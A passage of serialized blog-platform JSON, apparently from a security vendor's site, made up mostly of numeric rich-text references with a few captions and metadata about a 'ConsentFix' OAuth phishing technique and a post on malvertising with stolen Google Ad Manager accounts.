3},{"sys":37294},{"id":25066,"type":317,"linkType":318},[37296],{"data":37297,"marks":37298,"value":25071,"nodeType":173},{},[],{"data":37300,"marks":37301,"value":25075,"nodeType":173},{},[],{"data":37303,"content":37304,"nodeType":235},{},[37305],{"data":37306,"marks":37307,"value":24287,"nodeType":173},{},[],{"data":37309,"content":37310,"nodeType":178},{},[37311,37314,37318],{"data":37312,"marks":37313,"value":25088,"nodeType":173},{},[],{"data":37315,"marks":37316,"value":25093,"nodeType":173},{},[37317],{"type":370},{"data":37319,"marks":37320,"value":1477,"nodeType":173},{},[],{"data":37322,"content":37325,"nodeType":312},{"target":37323},{"sys":37324},{"id":25101,"type":317,"linkType":318},[],{"data":37327,"content":37328,"nodeType":178},{},[37329],{"data":37330,"marks":37331,"value":25109,"nodeType":173},{},[],{"data":37333,"content":37334,"nodeType":178},{},[37335],{"data":37336,"marks":37337,"value":25116,"nodeType":173},{},[],{"data":37339,"content":37340,"nodeType":178},{},[37341,37344,37352],{"data":37342,"marks":37343,"value":25123,"nodeType":173},{},[],{"data":37345,"content":37348,"nodeType":1698},{"target":37346},{"sys":37347},{"id":25128,"type":317,"linkType":318},[37349],{"data":37350,"marks":37351,"value":24433,"nodeType":173},{},[],{"data":37353,"marks":37354,"value":1477,"nodeType":173},{},[],{"data":37356,"content":37357,"nodeType":231},{},[],{"data":37359,"content":37360,"nodeType":169},{},[37361],{"data":37362,"marks":37363,"value":2824,"nodeType":173},{},[],{"data":37365,"content":37366,"nodeType":178},{},[37367],{"data":37368,"marks":37369,"value":25151,"nodeType":173},{},[],{"data":37371,"content":37372,"nodeType":178},{},[37373],{"data":37374,"marks":37375,"value":25158,"nodeType":173},{},[],{"data":37377,"content":37378,"nodeType":178},{},[37379,37382,37388,37391,37397],{"data":37380,"marks":37381,"value":25165,"nodeType":173},{},[],{"data":37383,"content":37384,"nodeType":186},{"uri":2862},[37385],{"data":37386,"marks":37387,"value":2865,"nodeType":173},{},[],{"data":37389,"marks":37390,"value":25175,"nodeType":173},{},[],{"data":37392,"content":37393,"nodeType":186},{"uri":2886},[37394],{"data":37395,"marks":37396,"value":2889,"nodeType":173},{},[],{"data":37398,"marks":37399,"value":1477,"nodeType":173},{},[],{"items":37401},[37402,37404],{"sys":37403,"name":509},{"id":508},{"sys":37405,"name":505},{"id":504},{"items":37407},[37408],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":37409},{"url":2911},{"items":37411},[37412],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":37413},{"url":1496},{"json":37415,"links":38116},{"nodeType":165,"data":37416,"content":37417},{},[37418,37434,37440,37445,37491,37497,37503,37506,37513,37519,37525,37571,37578,37584,37605,37611,37614,37621,37627,37633,37639,37645,37651,37657,37662,37669,37675,37691,37707,37710,37717,37723,37729,37735,37742,37758,37764,37769,37776,37792,37808,37910,37913,37920,37926,37932,37935,37942,37948,37954,37960,38019,38045,38048,38055,38061,38067,38073,38079,38105,38110],{"nodeType":178,"data":37419,"content":37420},{},[37421,37424,37431],{"nodeType":173,"value":19708,"marks":37422,"data":37423},[],{},{"nodeType":186,"data":37425,"content":37426},{"uri":1854},[37427],{"nodeType":173,"value":1857,"marks":37428,"data":37430},[37429],{"type":194},{},{"nodeType":173,"value":19719,"marks":37432,"data":37433},[],{},{"nodeType":178,"data":37435,"content":37436},{},[37437],{"nodeType":173,"value":19726,"marks":37438,"data":37439},[],{},{"nodeType":312,"data":37441,"content":37444},{"target":37442},{"sys":37443},{"id":19733,"type":317,"linkType":318},[],{"nodeType":178,"data":37446,"content":37447},{},[37448,37451,37458,37461,37468,37471,37478,37481,37488],{"nodeType":173,"value":19739,"marks":37449,"data":37450},[],{},{"nodeType":186,"data":37452,"content":37453},{"uri":19744},[37454],{"nodeType":173,"value":19747,"marks":37455,"data":37457},[37456],{"type":194},{},{"nodeType":173,"value":19752,"marks":37459,"data":37460},[],{},{"nodeType":186,"data":37462,"content":37463},{"uri":19757},[37464],{"nodeType":173,"value":1255,"marks":37465,"data":37467},[37466],{"type":194},{},{"nodeType":173,"value":2936,"marks":37469,"data":37470},[],{},{"nodeType":186,"data":37472,"content":37473},{"uri":19768},[37474],{"nodeType":173,"value":19771,"marks":37475,"data":37477},[37476],{"type":194},{},{"nodeType":173,"value":9534,"marks":37479,"data":37480},[],{},{"nodeType":186,"data":37482,"content":37483},{"uri":12080},[37484],{"nodeType":173,"value":19782,"marks":37485,"data":37487},[37486],{"type":194},{},{"nodeType":173,"value":19787,"marks":37489,"data":37490},[],{},{"nodeType":178,"data":37492,"content":37493},{},[37494],{"nodeType":173,"value":19794,"marks":37495,"data":37496},[],{},{"nodeType":178,"data":37498,"content":37499},{},[37500],{"nodeType":173,"value":19801,"marks":37501,"data":37502},[],{},{"nodeType":231,"data":37504,"content":37505},{},[],{"nodeType":169,"data":37507,"content":37508},{},[37509],{"nodeType":173,"value":19811,"marks":37510,"data":37512},[37511],{"type":370},{},{"nodeType":178,"data":37514,"content":37515},{},[37516],{"nodeType":173,"value":19819,"marks":37517,"data":37518},[],{},{"nodeType":178,"data":37520,"content":37521},{},[37522],{"nodeType":173,"value":19826,"marks":37523,"data":37524},[],{},{"nodeType":178,"data":37526,"content":37527},{},[37528,37531,37538,37541,37548,37551,37558,37561,37568],{"nodeType":173,"value":19833,"marks":37529,"data":37530},[],{},{"nodeType":186,"data":37532,"content":37533},{"uri":19838},[37534],{"nodeType":173,"value":8091,"marks":37535,"data":37537},[37536],{"type":194},{},{"nodeType":173,"value":933,"marks":37539,"data":37540},[],{},{"nodeType":186,"data":37542,"content":37543},{"uri":9275},[37544],{"nodeType":173,"value":1812,"marks":37545,"data":37547},[37546],{"type":194},{},{"nodeType":173,"value":19855,"marks":37549,"data":37550},[],{},{"nodeType":186,"data":37552,"content":37553},{"uri":8112},[37554],{"nodeType":173,"value":8115,"marks":37555,"data":37557},[37556],{"type":194},{},{"nodeType":173,"value":19866,"marks":37559,"data":37560},[],{},{"nodeType":186,"data":37562,"content":37563},{"uri":5002},[37564],{"nodeType":173,"value":19873,"marks":37565,"data":37567},[37566],{"type":194},{},{"nodeType":173,"value":1477,"marks":37569,"data":37570},[],{},{"nodeType":235,"data":37572,"content":37573},{},[37574],{"nodeType":173,"value":19884,"marks":37575,"data":37577},[37576],{"type":370},{},{"nodeType":178,"data":37579,"content":37580},{},[37581],{"nodeType":173,"value":19892,"marks":37582,"data":37583},[],{},{"nodeType":250,"data":37585,"content":37586},{},[37587,37596],{"nodeType":254,"data":37588,"content":37589},{},[37590],{"nodeType":178,"data":37591,"content":37592},{},[37593],{"nodeType":173,"value":19905,"marks":37594,"data":37595},[],{},{"nodeType":254,"data":37597,"content":37598},{},[37599],{"nodeType":178,"data":37600,"content":37601},{},[37602],{"nodeType":173,"value":19915,"marks":37603,"data":37604},[],{},{"nodeType":178,"data":37606,"content":37607},{},[37608],{"nodeType":173,"value":19922,"marks":37609,"data":37610},[],{},{"nodeType":231,"data":37612,"content":37613},{},[],{"nodeType":169,"data":37615,"content":37616},{},[37617],{"nodeType":173,"value":19932,"marks":37618,"data":37620},[37619],{"type":370},{},{"nodeType":178,"data":37622,"content":37623},{},[37624],{"nodeType":173,"value":19940,"marks":37625,"data":37626},[],{},{"nodeType":178,"data":37628,"content":37629},{},[37630],{"nodeType":173,"value":19947,"marks":37631,"data":37632},[],{},{"nodeType":178,"data":37634,"content":37635},{},[37636],{"nodeType":173,"value":19954,"marks":37637,"data":37638},[],{},{"nodeType":178,"data":37640,"content":37641},{},[37642],{"nodeType":173,"value":19961,"marks":37643,"data":37644},[],{},{"nodeType":178,"data":37646,"content":37647},{},[37648],{"nodeType":173,"value":19968,"marks":37649,"data":37650},[],{},{"nodeType":178,"data":37652,"content":37653},{},[37654],{"nodeType":173,"value":19975,"marks":37655,"data":37656},[],{},{"nodeType":312,"data":37658,"content":37661},{"target":37659},{"sys":37660},{"id":7950,"type":317,"linkType":318},[],{"nodeType":235,"data":37663,"content":37664},{},[37665],{"nodeType":173,"value":19987,"marks":37666,"data":37668},[37667],{"type":370},{},{"nodeType":178,"data":37670,"content":37671},{},[37672],{"nodeType":173,"value":19995,"marks":37673,"data":37674},[],{},{"nodeType":178,"data":37676,"content":37677},{},[37678,37681,37688],{"nodeType":173,"value":20002,"marks":37679,"data":37680},[],{},{"nodeType":186,"data":37682,"content":37683},{"uri":1854},[37684],{"nodeType":173,"value":20009,"marks":37685,"data":37687},[37686],{"type":194},{},{"nodeType":173,"value":20014,"marks":37689,"data":37690},[],{},{"nodeType":178,"data":37692,"content":37693},{},[37694,37697,37704],{"nodeType":173,"value":20021,"marks":37695,"data":37696},[],{},{"nodeType":186,"data":37698,"content":37699},{"uri":20026},[37700],{"nodeType":173,"value":20029,"marks":37701,"data":37703},[37702],{"type":194},{},{"nodeType":173,"value":20034,"marks":37705,"data":37706},[],{},{"nodeType":231,"data":37708,"content":37709},{},[],{"nodeType":169,"data":37711,"content":37712},{},[37713],{"nodeType":173,"value":20044,"marks":37714,"data":37716},[37715],{"type":370},{},{"nodeType":178,"data":37718,"content":37719},{},[37720],{"nodeType":173,"value":20052,"marks":37721,"data":37722},[],{},{"nodeType":178,"data":37724,"content":37725},{},[37726],{"nodeType":173,"value":20059,"marks":37727,"data":37728},[],{},{"nodeType":178,"data":37730,"content":37731},{},[37732],{"nodeType":173,"value":20066,"marks":37733,"data":37734},[],{},{"nodeType":235,"data":37736,"content":37737},{},[37738],{"nodeType":173,"value":20073,"marks":37739,"data":37741},[37740],{"type":370},{},{"nodeType":178,"data":37743,"content":37744},{},[37745,37748,37755],{"nodeType":173,"value":20081,"marks":37746,"data":37747},[],{},{"nodeType":186,"data":37749,"content":37750},{"uri":19744},[37751],{"nodeType":173,"value":20088,"marks":37752,"data":37754},[37753],{"type":194},{},{"nodeType":173,"value":20093,"marks":37756,"data":37757},[],{},{"nodeType":178,"data":37759,"content":37760},{},[37761],{"nodeType":173,"value":20100,"marks":37762,"data":37763},[],{},{"nodeType":312,"data":37765,"content":37768},{"target":37766},{"sys":37767},{"id":20107,"type":317,"linkType":318},[],{"nodeType":235,"data":37770,"content":37771},{},[37772],{"nodeType":173,"value":20113,"marks":37773,"data":37775},[37774],{"type":370},{},{"nodeType":178,"data":37777,"content":37778},{},[37779,37782,37789],{"nodeType":173,"value":20121,"marks":37780,"data":37781},[],{},{"nodeType":186,"data":37783,"content":37784},{"uri":20126},[37785],{"nodeType":173,"value":20129,"marks":37786,"data":37788},[37787],{"type":194},{},{"nodeType":173,"value":20134,"marks":37790,"data":37791},[],{},{"nodeType":178,"data":37793,"content":37794},{},[37795,37798,37805],{"nodeType":173,"value":20141,"marks":37796,"data":37797},[],{},{"nodeType":186,"data":37799,"content":37800},{"uri":20146},[37801],{"nodeType":173,"value":20149,"marks":37802,"data":37804},[37803],{"type":194},{},{"nodeType":173,"value":20154,"marks":37806,"data":37807},[],{},{"nodeType":250,"data":37809,"content":37810},{},[37811,37820,37829,37838,37847,37856,37865,37874,37883,37892,37901],{"nodeType":254,"data":37812,"content":37813},{},[37814],{"nodeType":178,"data":37815,"content":37816},{},[37817],{"nodeType":173,"value":20167,"marks":37818,"data":37819},[],{},{"nodeType":254,"data":37821,"content":37822},{},[37823],{"nodeType":178,"data":37824,"content":37825},{},[37826],{"nodeType":173,"value":20177,"marks":37827,"data":37828},[],{},{"nodeType":254,"data":37830,"content":37831},{},[37832],{"nodeType":178,"data":37833,"content":37834},{},[37835],{"nodeType":173,"value":20187,"marks":37836,"data":37837},[],{},{"nodeType":254,"data":37839,"content":37840},{},[37841],{"nodeType":178,"data":37842,"content":37843},{},[37844],{"nodeType":173,"value":20197,"marks":37845,"data":37846},[],{},{"nodeType":254,"data":37848,"content":37849},{},[37850],{"nodeType":178,"data":37851,"content":37852},{},[37853],{"nodeType":173,"value":20207,"marks":37854,"data":37855},[],{},{"nodeType":254,"data":37857,"content":37858},{},[37859],{"nodeType":178,"data":37860,"content":37861},{},[37862],{"nodeType":173,"value":20217,"marks":37863,"data":37864},[],{},{"nodeType":254,"data":37866,"content":37867},{},[37868],{"nodeType":178,"data":37869,"content":37870},{},[37871],{"nodeType":173,"value":20227,"marks":37872,"data":37873},[],{},{"nodeType":254,"data":37875,"content":37876},{},[37877],{"nodeType":178,"data":37878,"content":37879},{},[37880],{"nodeType":173,"value":20237,"marks":37881,"data":37882},[],{},{"nodeType":254,"data":37884,"content":37885},{},[37886],{"nodeType":178,"data":37887,"content":37888},{},[37889],{"nodeType":173,"value":20247,"marks":37890,"data":37891},[],{},{"nodeType":254,"data":37893,"content":37894},{},[37895],{"nodeType":178,"data":37896,"content":37897},{},[37898],{"nodeType":173,"value":20257,"marks":37899,"data":37900},[],{},{"nodeType":254,"data":37902,"content":37903},{},[37904],{"nodeType":178,"data":37905,"content":37906},{},[37907],{"nodeType":173,"value":20267,"marks":37908,"data":37909},[],{},{"nodeType":231,"data":37911,"content":37912},{},[],{"nodeType":169,"data":37914,"content":37915},{},[37916],{"nodeType":173,"value":20277,"marks":37917,"data":37919},[37918],{"type":370},{},{"nodeType":178,"data":37921,"content":37922},{},[37923],{"nodeType":173,"value":20285,"marks":37924,"data":37925},[],{},{"nodeType":178,"data":37927,"content":37928},{},[37929],{"nodeType":173,"value":20292,"marks":37930,"data":37931},[],{},{"nodeType":231,"data":37933,"content":37934},{},[],{"nodeType":169,"data":37936,"content":37937},{},[37938],{"nodeType":173,"value":20302,"marks":37939,"data":37941},[37940],{"type":370},{},{"nodeType":178,"data":37943,"content":37944},{},[37945],{"nodeType":173,"value":20310,"marks":37946,"data":37947},[],{},{"nodeType":178,"data":37949,"content":37950},{},[37951],{"nodeType":173,"value":20317,"marks":37952,"data":37953},[],{},{"nodeType":178,"data":37955,"content":37956},{},[37957],{"nodeType":173,"value":20324,"marks":37958,"data":37959},[],{},{"nodeType":250,"data":37961,"content":37962},{},[37963,37982,37991,38010],{"nodeType":254,"data":37964,"content":37965},{},[37966],{"nodeType":178,"data":37967,"content":37968},{},[37969,37972,37979],{"nodeType":173,"value":20337,"marks":37970,"data":37971},[],{},{"nodeType":186,"data":37973,"content":37974},{"uri":20342},[37975],{"nodeType":173,"value":20345,"marks":37976,"data":37978},[37977],{"type":194},{},{"nodeType":173,"value":20350,"marks":37980,"data":37981},[],{},{"nodeType":254,"data":37983,"content":37984},{},[37985],{"nodeType":178,"data":37986,"content":37987},{},[37988],{"nodeType":173,"value":20360,"marks":37989,"data":37990},[],{},{"nodeType":254,"data":37992,"content":37993},{},[37994],{"nodeType":178,"data":37995,"content":37996},{},[37997,38000,38007],{"nodeType":173,"value":37,"marks":37998,"data":37999},[],{},{"nodeType":186,"data":38001,"content":38002},{"uri":12080},[38003],{"nodeType":173,"value":20376,"marks":38004,"data":38006},[38005],{"type":194},{},{"nodeType":173,"value":20381,"marks":38008,"data":38009},[],{},{"nodeType":254,"data":38011,"content":38012},{},[38013],{"nodeType":178,"data":38014,"content":38015},{},[38016],{"nodeType":173,"value":20391,"marks":38017,"data":38018},[],{},{"nodeType":178,"data":38020,"content":38021},{},[38022,38025,38032,38035,38042],{"nodeType":173,"value":20398,"marks":38023,"data":38024},[],{},{"nodeType":186,"data":38026,"content":38027},{"uri":20403},[38028],{"nodeType":173,"value":20406,"marks":38029,"data":38031},[38030],{"type":194},{},{"nodeType":173,"value":20411,"marks":38033,"data":38034},[],{},{"nodeType":186,"data":38036,"content":38037},{"uri":19768},[38038],{"nodeType":173,"value":19771,"marks":38039,"data":38041},[38040],{"type":194},{},{"nodeType":173,"value":197,"marks":38043,"data":38044},[],{},{"nodeType":231,"data":38046,"content":38047},{},[],{"nodeType":169,"data":38049,"content":38050},{},[38051],{"nodeType":173,"value":20431,"marks":38052,"data":38054},[38053],{"type":370},{},{"nodeType":178,"data":38056,"content":38057},{},[38058],{"nodeType":173,"value":8525,"marks":38059,"data":38060},[],{},{"nodeType":178,"data":38062,"content":38063},{},[38064],{"nodeType":173,"value":20445,"marks":38065,"data":38066},[],{},{"nodeType":178,"data":38068,"content":38069},{},[38070],{"nodeType":173,"value":20452,"marks":38071,"data":38072},[],{},{"nodeType":178,"data":38074,"content":38075},{},[38076],{"nodeType":173,"value":20459,"marks":38077,"data":38078},[],{},{"nodeType":178,"data":38080,"content":38081},{},[38082,38085,38092,38095,38102],{"nodeType":173,"value":1451,"marks":38083,"data":38084},[],{},{"nodeType":186,"data":38086,"content":38087},{"uri":1456},[38088],{"nodeType":173,"value":1459,"marks":38089,"data":38091},[38090],{"type":194},{},{"nodeType":173,"value":1464,"marks":38093,"data":38094},[],{},{"nodeType":186,"data":38096,"content":38097},{"uri":1469},[38098],{"nodeType":173,"value":1472,"marks":38099,"data":38101},[38100],{"type":194},{},{"nodeType":173,"value":1477,"marks":38103,"data":38104},[],{},{"nodeType":312,"data":38106,"content":38109},{"target":38107},{"sys":38108},{"id":20492,"type":317,"linkType":318},[],{"nodeType":178,"data":38111,"content":38112},{},[38113],{"nodeType":173,"value":37,"marks":38114,"data":38115},[],{},{"entries":38117},{"hyperlink":38118,"inline":38119,"block":38120},[],[],[38121,38127,38133,38138],{"sys":38122,"__typename":5345,"title":38123,"caption":38123,"layoutMode":118,"file":38124},{"id":19733},"“ConsentFix” phishing site detected and blocked by Push. ",{"url":38125,"width":5358,"height":38126},"https://images.ctfassets.net/y1cdw1ablpvd/3FyJ6MHYvAi7z9O7LahUer/ac4384da808287779f1e1f622186dcbc/1.png",1185,{"sys":38128,"__typename":5345,"title":38129,"caption":38130,"layoutMode":118,"file":38131},{"id":7950},"ConsentFix attack breakdown.","ConsentFix attack breakdown: The victim is tricked into copy-and-pasting a URL containing OAuth key material into a phishing page.",{"url":38132,"width":5358,"height":40},"https://images.ctfassets.net/y1cdw1ablpvd/7x6SiBWarYH3w4nPfjtf7r/4c1dd037b9ad47ccbba0a87256ecd909/2.png",{"sys":38134,"__typename":5345,"title":38135,"caption":38135,"layoutMode":118,"file":38136},{"id":20107},"John Hammond showed off a slick new ConsentFix implementation.",{"url":38137,"width":5399,"height":5400},"https://images.ctfassets.net/y1cdw1ablpvd/1bjvJgwJQYYITray4cgquD/056744beab8fd24153b1c42b73090aeb/consentfix_v2.gif",{"sys":38139,"__typename":15269,"type":15270,"ctaText":38140,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":38141},{"id":20492},"Want to see how security controls match up with modern browser-based attacks? Register for our upcoming webinar for an interactive walkthrough.","https://pushsecurity.com/webinar/investigating-browser-threats","content:blog:consentfix-debrief.json","blog/consentfix-debrief.json","blog/consentfix-debrief",{"_path":38146,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":38147,"ogImage":118,"summary":38150,"title":38161,"subtitle":118,"metaTitle":38162,"synopsis":38160,"hashTags":118,"publishedDate":14584,"slug":38163,"tagsCollection":38164,"relatedBlogPostsCollection":38170,"authorsCollection":40224,"content":40228,"_id":40852,"_type":5439,"_source":5440,"_file":40853,"_stem":40854,"_extension":5439},"/blog/cyber-criminal-ecosystem-analysis",{"id":38148,"publishedAt":38149},"2U6QpQ9rkY8x5ES48okHZB","2026-01-12T10:13:52.486Z",{"json":38151},{"data":38152,"content":38153,"nodeType":165},{},[38154],{"data":38155,"content":38156,"nodeType":178},{},[38157],{"data":38158,"marks":38159,"value":38160,"nodeType":173},{},[],"Attackers are going out of their way to target Google Ad Manager accounts, powering malvertising scams. Here’s what you need to know.","How cyber criminals power malvertising scams with stolen accounts","Analysing the malvertising criminal ecosystem","cyber-criminal-ecosystem-analysis",{"items":38165},[38166,38168],{"sys":38167,"name":505},{"id":504},{"sys":38169,"name":509},{"id":508},{"items":38171},[38172,38713,39541],{"__typename":1528,"sys":38173,"content":38174,"title":6639,"synopsis":14583,"hashTags":118,"publishedDate":14584,"slug":6640,"tagsCollection":38703,"authorsCollection":38709},{"id":1702},{"json":38175},{"nodeType":165,"data":38176,"content":38177},{},[38178,38184,38190,38231,38236,38242,38248,38253,38258,38263,38266,38273,38279,38284,38290,38295,38300,38306,38311,38326,38329,38336,38342,38348,38354,38360,38365,38380,38383,38390,38396,38442,38448,38454,38457,38464,38470,38476,38482,38508,38511,38518,38534,38540,38579,38585,38624,38630,38696],{"nodeType":178,"data":38179,"content":38180},{},[38181],{"nodeType":173,"value":13992,"marks":38182,"data":38183},[],{},{"nodeType":178,"data":38185,"content":38186},{},[38187],{"nodeType":173,"value":13999,"marks":38188,"data":38189},[],{},{"nodeType":250,"data":38191,"content":38192},{},[38193,38212],{"nodeType":254,"data":38194,"content":38195},{},[38196],{"nodeType":178,"data":38197,"content":38198},{},[38199,38202,38209],{"nodeType":173,"value":14012,"marks":38200,"data":38201},[],{},{"nodeType":186,"data":38203,"content":38204},{"uri":14017},[38205],{"nodeType":173,"value":14020,"marks":38206,"data":38208},[38207],{"type":194},{},{"nodeType":173,"value":14025,"marks":38210,"data":38211},[],{},{"nodeType":254,"data":38213,"content":38214},{},[38215],{"nodeType":178,"data":38216,"content":38217},{},[38218,38221,38228],{"nodeType":173,"value":14035,"marks":38219,"data":38220},[],{},{"nodeType":186,"data":38222,"content":38223},{"uri":14040},[38224],{"nodeType":173,"value":14043,"marks":38225,"data":38227},[38226],{"type":194},{},{"nodeType":173,"value":14048,"marks":38229,"data":38230},[],{},{"nodeType":312,"data":38232,"content":38235},{"target":38233},{"sys":38234},{"id":14055,"type":317,"linkType":318},[],{"nodeType":178,"data":38237,"content":38238},{},[38239],{"nodeType":173,"value":14061,"marks":38240,"data":38241},[],{},{"nodeType":178,"data":38243,"content":38244},{},[38245],{"nodeType":173,"value":14068,"marks":38246,"data":38247},[],{},{"nodeType":312,"data":38249,"content":38252},{"target":38250},{"sys":38251},{"id":14075,"type":317,"linkType":318},[],{"nodeType":312,"data":38254,"content":38257},{"target":38255},{"sys":38256},{"id":14081,"type":317,"linkType":318},[],{"nodeType":312,"data":38259,"content":38262},{"target":38260},{"sys":38261},{"id":14087,"type":317,"linkType":318},[],{"nodeType":231,"data":38264,"content":38265},{},[],{"nodeType":169,"data":38267,"content":38268},{},[38269],{"nodeType":173,"value":14096,"marks":38270,"data":38272},[38271],{"type":370},{},{"nodeType":178,"data":38274,"content":38275},{},[38276],{"nodeType":173,"value":14104,"marks":38277,"data":38278},[],{},{"nodeType":312,"data":38280,"content":38283},{"target":38281},{"sys":38282},{"id":14111,"type":317,"linkType":318},[],{"nodeType":178,"data":38285,"content":38286},{},[38287],{"nodeType":173,"value":14117,"marks":38288,"data":38289},[],{},{"nodeType":312,"data":38291,"content":38294},{"target":38292},{"sys":38293},{"id":14124,"type":317,"linkType":318},[],{"nodeType":312,"data":38296,"content":38299},{"target":38297},{"sys":38298},{"id":14130,"type":317,"linkType":318},[],{"nodeType":178,"data":38301,"content":38302},{},[38303],{"nodeType":173,"value":14136,"marks":38304,"data":38305},[],{},{"nodeType":312,"data":38307,"content":38310},{"target":38308},{"sys":38309},{"id":14143,"type":317,"linkType":318},[],{"nodeType":178,"data":38312,"content":38313},{},[38314,38317,38323],{"nodeType":173,"value":14149,"marks":38315,"data":38316},[],{},{"nodeType":186,"data":38318,"content":38319},{"uri":14017},[38320],{"nodeType":173,"value":14156,"marks":38321,"data":38322},[],{},{"nodeType":173,"value":197,"marks":38324,"data":38325},[],{},{"nodeType":231,"data":38327,"content":38328},{},[],{"nodeType":169,"data":38330,"content":38331},{},[38332],{"nodeType":173,"value":14169,"marks":38333,"data":38335},[38334],{"type":370},{},{"nodeType":178,"data":38337,"content":38338},{},[38339],{"nodeType":173,"value":14177,"marks":38340,"data":38341},[],{},{"nodeType":178,"data":38343,"content":38344},{},[38345],{"nodeType":173,"value":14184,"marks":38346,"data":38347},[],{},{"nodeType":178,"data":38349,"content":38350},{},[38351],{"nodeType":173,"value":14191,"marks":38352,"data":38353},[],{},{"nodeType":178,"data":38355,"content":38356},{},[38357],{"nodeType":173,"value":14198,"marks":38358,"data":38359},[],{},{"nodeType":312,"data":38361,"content":38364},{"target":38362},{"sys":38363},{"id":14205,"type":317,"linkType":318},[],{"nodeType":178,"data":38366,"content":38367},{},[38368,38371,38377],{"nodeType":173,"value":14211,"marks":38369,"data":38370},[],{},{"nodeType":186,"data":38372,"content":38373},{"uri":14216},[38374],{"nodeType":173,"value":14219,"marks":38375,"data":38376},[],{},{"nodeType":173,"value":197,"marks":38378,"data":38379},[],{},{"nodeType":231,"data":38381,"content":38382},{},[],{"nodeType":169,"data":38384,"content":38385},{},[38386],{"nodeType":173,"value":14232,"marks":38387,"data":38389},[38388],{"type":370},{},{"nodeType":178,"data":38391,"content":38392},{},[38393],{"nodeType":173,"value":14240,"marks":38394,"data":38395},[],{},{"nodeType":178,"data":38397,"content":38398},{},[38399,38402,38409,38412,38419,38422,38429,38432,38439],{"nodeType":173,"value":14247,"marks":38400,"data":38401},[],{},{"nodeType":186,"data":38403,"content":38404},{"uri":1842},[38405],{"nodeType":173,"value":1845,"marks":38406,"data":38408},[38407],{"type":194},{},{"nodeType":173,"value":14258,"marks":38410,"data":38411},[],{},{"nodeType":186,"data":38413,"content":38414},{"uri":14263},[38415],{"nodeType":173,"value":14266,"marks":38416,"data":38418},[38417],{"type":194},{},{"nodeType":173,"value":2936,"marks":38420,"data":38421},[],{},{"nodeType":186,"data":38423,"content":38424},{"uri":14275},[38425],{"nodeType":173,"value":14278,"marks":38426,"data":38428},[38427],{"type":194},{},{"nodeType":173,"value":9534,"marks":38430,"data":38431},[],{},{"nodeType":186,"data":38433,"content":38434},{"uri":14287},[38435],{"nodeType":173,"value":14290,"marks":38436,"data":38438},[38437],{"type":194},{},{"nodeType":173,"value":14295,"marks":38440,"data":38441},[],{},{"nodeType":178,"data":38443,"content":38444},{},[38445],{"nodeType":173,"value":14302,"marks":38446,"data":38447},[],{},{"nodeType":178,"data":38449,"content":38450},{},[38451],{"nodeType":173,"value":14309,"marks":38452,"data":38453},[],{},{"nodeType":231,"data":38455,"content":38456},{},[],{"nodeType":169,"data":38458,"content":38459},{},[38460],{"nodeType":173,"value":8517,"marks":38461,"data":38463},[38462],{"type":370},{},{"nodeType":178,"data":38465,"content":38466},{},[38467],{"nodeType":173,"value":14326,"marks":38468,"data":38469},[],{},{"nodeType":178,"data":38471,"content":38472},{},[38473],{"nodeType":173,"value":14333,"marks":38474,"data":38475},[],{},{"nodeType":178,"data":38477,"content":38478},{},[38479],{"nodeType":173,"value":14340,"marks":38480,"data":38481},[],{},{"nodeType":178,"data":38483,"content":38484},{},[38485,38488,38495,38498,38505],{"nodeType":173,"value":1451,"marks":38486,"data":38487},[],{},{"nodeType":186,"data":38489,"content":38490},{"uri":1456},[38491],{"nodeType":173,"value":1459,"marks":38492,"data":38494},[38493],{"type":194},{},{"nodeType":173,"value":1464,"marks":38496,"data":38497},[],{},{"nodeType":186,"data":38499,"content":38500},{"uri":1469},[38501],{"nodeType":173,"value":1472,"marks":38502,"data":38504},[38503],{"type":194},{},{"nodeType":173,"value":1477,"marks":38506,"data":38507},[],{},{"nodeType":231,"data":38509,"content":38510},{},[],{"nodeType":169,"data":38512,"content":38513},{},[38514],{"nodeType":173,"value":8406,"marks":38515,"data":38517},[38516],{"type":370},{},{"nodeType":178,"data":38519,"content":38520},{},[38521,38524,38531],{"nodeType":173,"value":8414,"marks":38522,"data":38523},[],{},{"nodeType":186,"data":38525,"content":38526},{"uri":8419},[38527],{"nodeType":173,"value":8422,"marks":38528,"data":38530},[38529],{"type":194},{},{"nodeType":173,"value":8427,"marks":38532,"data":38533},[],{},{"nodeType":178,"data":38535,"content":38536},{},[38537],{"nodeType":173,"value":14399,"marks":38538,"data":38539},[],{},{"nodeType":250,"data":38541,"content":38542},{},[38543,38552,38561,38570],{"nodeType":254,"data":38544,"content":38545},{},[38546],{"nodeType":178,"data":38547,"content":38548},{},[38549],{"nodeType":173,"value":14412,"marks":38550,"data":38551},[],{},{"nodeType":254,"data":38553,"content":38554},{},[38555],{"nodeType":178,"data":38556,"content":38557},{},[38558],{"nodeType":173,"value":14422,"marks":38559,"data":38560},[],{},{"nodeType":254,"data":38562,"content":38563},{},[38564],{"nodeType":178,"data":38565,"content":38566},{},[38567],{"nodeType":173,"value":14432,"marks":38568,"data":38569},[],{},{"nodeType":254,"data":38571,"content":38572},{},[38573],{"nodeType":178,"data":38574,"content":38575},{},[38576],{"nodeType":173,"value":14442,"marks":38577,"data":38578},[],{},{"nodeType":178,"data":38580,"content":38581},{},[38582],{"nodeType":173,"value":14449,"marks":38583,"data":38584},[],{},{"nodeType":250,"data":38586,"content":38587},{},[38588,38597,38606,38615],{"nodeType":254,"data":38589,"content":38590},{},[38591],{"nodeType":178,"data":38592,"content":38593},{},[38594],{"nodeType":173,"value":14462,"marks":38595,"data":38596},[],{},{"nodeType":254,"data":38598,"content":38599},{},[38600],{"nodeType":178,"data":38601,"content":38602},{},[38603],{"nodeType":173,"value":14472,"marks":38604,"data":38605},[],{},{"nodeType":254,"data":38607,"content":38608},{},[38609],{"nodeType":178,"data":38610,"content":38611},{},[38612],{"nodeType":173,"value":14482,"marks":38613,"data":38614},[],{},{"nodeType":254,"data":38616,"content":38617},{},[38618],{"nodeType":178,"data":38619,"content":38620},{},[38621],{"nodeType":173,"value":14492,"marks":38622,"data":38623},[],{},{"nodeType":178,"data":38625,"content":38626},{},[38627],{"nodeType":173,"value":14499,"marks":38628,"data":38629},[],{},{"nodeType":250,"data":38631,"content":38632},{},[38633,38642,38651,38660,38669,38678,38687],{"nodeType":254,"data":38634,"content":38635},{},[38636],{"nodeType":178,"data":38637,"content":38638},{},[38639],{"nodeType":173,"value":14512,"marks":38640,"data":38641},[],{},{"nodeType":254,"data":38643,"content":38644},{},[38645],{"nodeType":178,"data":38646,"content":38647},{},[38648],{"nodeType":173,"